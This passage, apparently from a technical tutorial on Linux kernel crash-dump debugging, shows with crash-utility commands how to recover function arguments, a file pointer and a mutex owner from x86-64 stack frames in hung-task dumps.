    • Stack frame content will be that of when the function (whose stack frame you’re looking at) called the next-deeper function. If the function you’re looking at went on to modify that stack location, before calling the next-deeper function, that is what you will see when you look at the stack frame
  • Remember that there may be more than one code path branch within a function, leading to a callq instruction. The different paths may populate the function-call registers from different sources, and/or with different values. Your linear reading of the instructions leading up to the callq may not be the path that the code took in every instance.

FAQ

References

  1. https://cs61.seas.harvard.edu/site/2018/Asm2/
  2. https://www.wikiwand.com/en/X86_calling_conventions#/x86-64_calling_conventions

Worked examples

Example 1

In this example, we have a hanging task, stuck trying to fsync a file. We want to obtain the struct file pointer, and fl_owner for the file in question.

Let’s start by trying to find it via the arguments to filp_close.

Note: bt -l shows file and line number of each stack trace function call.

int filp_close(struct file *filp, fl_owner_t id)
typedef void *fl_owner_t;

The compiler will use registers %rdi & %rsi, respectively, to pass the two arguments to filp_close.

Let’s look at the full stack frame for filp_close:

Let’s disassemble the calling function put_files_struct, to see where the compiler obtains the values it will pass in registers to filp_close:

The first argument, the struct file pointer will be passed in register %rdi. The compiler fills that register in this way:

We can’t easily retrieve the first argument using this method, since we don’t know the values of %rcx or %rax.

So how about the second argument? That is passed in register %rsi, which is populated from another register %r13:

0xffffffff8122d5e9 <put_files_struct+0x89>: mov %r13,%rsi

That’s not immediately helpful, until we notice what the called function filp_close does, immediately after being called:

crash7latest> dis -x filp_close | head
0xffffffff8120b1b0 <filp_close>: push %rbp
0xffffffff8120b1b1 <filp_close+0x1>: mov %rsp,%rbp
0xffffffff8120b1b4 <filp_close+0x4>: push %r13

Notice that filp_close pushes %r13 onto its stack. This is the first push instruction that is done by filp_close after its initial push of %rbp. Let’s look again at the stack frame for filp_close:

#13 [ffff8807b1f1fc20] filp_close+0x36 at ffffffff8120b1e6
    ffff8807b1f1fc28: ffffffffffffffff 000000000000ffff
    ffff8807b1f1fc38: 0000000000000000 [ffff8800c0b21b80:files_cache]
    ffff8807b1f1fc48: ffff8807b1f1fc98 put_files_struct+145

Referring back to the Basics section, we can identify the stack frame base pointer %rbp for filp_close as 0xffff8807b1f1fc48.

Referring back to the stack frame layout section, we can see that the stack for filp_close starts at the very bottom with its return address put_files_struct+145. The next address "up" (in the bt display) is location 0xffff8807b1f1fc48, which is filp_close's stack frame base pointer %rbp. It contains a pointer to the parent (put_files_struct) stack frame base pointer 0xffff8807b1f1fc98. From then on "up" are the normal stack pushes done by filp_close. Since the push of %r13 is the first push (following the preamble push of %rbp), we find it next: 0xffff8800c0b21b80, which is the value of fl_owner_t id.

To find on the stack the content of push number n (following the preamble push of %rbp) we calculate the address: %rbp - (n * 8). In this case, n == 1, the first push, so:

crash7latest> px (0xffff8807b1f1fc48 - 1*8)
$1 = 0xffff8807b1f1fc40

Note: px prints the expression in hex. Now read the contents at that address:

crash7latest> rd 0xffff8807b1f1fc40
ffff8807b1f1fc40: ffff8800c0b21b80

Thus we find the value of fl_owner_t id == 0xffff8800c0b21b80.

We could, of course, simply have walked "up" the stack frame visually, counting pushes, rather than manually calculating the address.

We still need to find the first argument, the struct file, but we may find that elsewhere, in another function on the stack… it is also the first argument of:

int vfs_fsync(struct file *file, int datasync)

and so will be passed in register %rdi.

Here’s the relevant extract from the stack backtrace:

#11 [ffff8807b1f1fbf0] vfs_fsync+0x1c at ffffffff8124123c
#12 [ffff8807b1f1fc00] nfs_file_flush+0x80 at ffffffffc02d2630 [nfs]

Let’s disassemble the caller, leading up to the call:

On line 8 we see that register %rdi — the first argument to vfs_fsync — is populated from register %rbx. (Whilst we’re here, note that the second argument is passed in register %esi, which is the 32-bit subset of the 64-bit register %rsi, since the second argument is an integer: int datasync)

Now disassemble the called function:

We see that vfs_fsync does not save %rbx on its stack, but nor does it alter it before calling vfs_fsync_range. Now disassemble the latter:

crash7latest> dis -x vfs_fsync_range | head
0xffffffff81241170 <vfs_fsync_range>: push %rbp
0xffffffff81241171 <vfs_fsync_range+0x1>: mov %rsp,%rbp
0xffffffff81241174 <vfs_fsync_range+0x4>: push %r14
0xffffffff81241176 <vfs_fsync_range+0x6>: push %r13
0xffffffff81241178 <vfs_fsync_range+0x8>: push %r12
0xffffffff8124117a <vfs_fsync_range+0xa>: push %rbx

We see that vfs_fsync_range saves %rbx to its stack. It’s the fourth push (after the preamble).

Find vfs_fsync_range’s stack frame base pointer: 0xffff8807b1f1fbe8. Use the method shown in the Basics section.

Find the value four 8-byte values (four pushes) up from the stack frame base:

crash7latest> px (0xffff8807b1f1fbe8 - 4*8)
$4 = 0xffff8807b1f1fbc8
crash7latest> rd 0xffff8807b1f1fbc8
ffff8807b1f1fbc8: ffff8807eb507b00

We have found our value:

struct file *file = 0xffff8807eb507b00

Perform a sanity check; let’s check that the file structure’s ops pointers point to an NFS function:

crash7latest> struct -p file.f_op ffff8807eb507b00 | grep llseek
  llseek = 0xffffffffc034d2c0,
crash7latest> dis 0xffffffffc034d2c0 1
0xffffffffc034d2c0 nfs4_file_llseek: push %rbp

Example 2

Here’s a UEK4 dump, where a process is hung, blocked waiting for a mutex.

We want to find the mutex on which it is waiting. Let’s see how do_last calls mutex_lock:

dis -r (reverse) displays all instructions from the start of the routine up to and including the designated address.

dis -x overrides the default output format with hexadecimal format.

The first arg to mutex_lock is passed in %rdi, which is populated like this:

0xffffffff8121409d <do_last+0x36d>: mov -0x48(%rbp),%rax
0xffffffff812140a1 <do_last+0x371>: mov 0x30(%rax),%rax
0xffffffff812140a5 <do_last+0x375>: lea 0xa8(%rax),%rdi

We need to start with do_last‘s stack frame (base) pointer %rbp.

That may be found here:

crash7latest> bt -FFsx
...
ffff88180dc37ca8: ***ffff88180dc37d58*** do_last+901
#5 [ffff88180dc37cb0] do_last+0x385 at ffffffff812140b5

%rbp is ffff88180dc37ca8, and the value at that location — denoted by (%rbp) — is ffff88180dc37d58

Then we can emulate the effects of the mov/lea instructions, to arrive at the value that do_last put into %rdi:
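For the first mov, the operand -0x48(%rbp) works out as follows (the $N history number shown is illustrative):

crash7latest> px (0xffff88180dc37d58 - 0x48)
$2 = 0xffff88180dc37d10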

We can also note that since we’ve offset from the stack frame pointer %rbp, this value is on the stack, and bt will tell us more about it, specifically whether it’s part of a slab cache and, if so, which one:

Address 0xffff88180dc37d10 contains a pointer to something from the dentry slab cache, i.e. a dentry.

At this point, we have the dentry pointer in %rax. The next instruction offsets 0x30 from the dentry:

struct -o shows member offsets when displaying structure definitions; if used with an address or symbol argument, each member will be preceded by its virtual address.

struct -x overrides default output format with hexadecimal format.

So the above is the inode.

The next instruction offsets 0xa8 from the inode:

So the above is the mutex, and this (0xffff881d4603e6a8) is what ends up in %rdi, which becomes the first arg to mutex_lock, as expected:

void __sched mutex_lock(struct mutex *lock)

Having found the mutex, we would likely want to find its owner:
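The same owner lookup shown in Example 3 below applies here (outputs omitted; the task address comes from the first command):

crash7latest> mutex.owner 0xffff881d4603e6a8
crash7latest> task <owner task address> | head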

Example 3

In this example, we look at a UEK3 crash dump, from a system where processes were spending a lot of time in ‘D’ state waiting for an NFS server to respond. The system crashed since hung_task_panic was set (which is not a good idea on a production system, and should never be set on an NFS client or server).

Looking at the hung task:

From the hung task traceback, we can see that nfs_getattr is stuck waiting on a mutex. It wants to write back dirty pages before performing the getattr call, and it grabs the inode mutex to keep other apps from writing whilst we’re trying to write back. So, we need to find out who’s got that inode mutex.

Let’s see how nfs_getattr calls mutex_lock:

The first arg to mutex_lock is the mutex, which is passed in %rdi.

We can see that nfs_getattr fills %rdi from %rdx, before calling mutex_lock, but it also stores %rdx at an offset from its stack frame base pointer %rbp:

0xffffffffc09e5dc5 <nfs_getattr+0x1a5>: mov %rdx,-0x38(%rbp)

We can get nfs_getattr’s %rbp here:

So let’s calculate that offset:

crash7latest> px (0xffff9c88b79bfe30-0x38)
$1 = 0xffff9c88b79bfdf8

and read the value there, which will be the value of %rdx, i.e. the address of the mutex:

crash7latest> rd -x 0xffff9c88b79bfdf8
ffff9c88b79bfdf8: ffff9c8ed6bb4808

Note: rd reads memory

Let’s see who owns it:

crash7latest> mutex.owner 0xffff9c8ed6bb4808
owner = 0xffff9c5f0ab25140
crash7latest> task 0xffff9c5f0ab25140 | head
PID: 30365 TASK: ffff9c5f0ab25140 CPU: 5 COMMAND: "ls"

and what is that ls task doing?

So, the mutex is held by another NFS getattr task, that is in the process of performing the write-back. This is likely just part of the normal NFS writeback, blocked by congestion, a slow server, or some other interruption.

As mentioned already, in general it is advised never to set hung_task_panic on a production NFS system (client or server).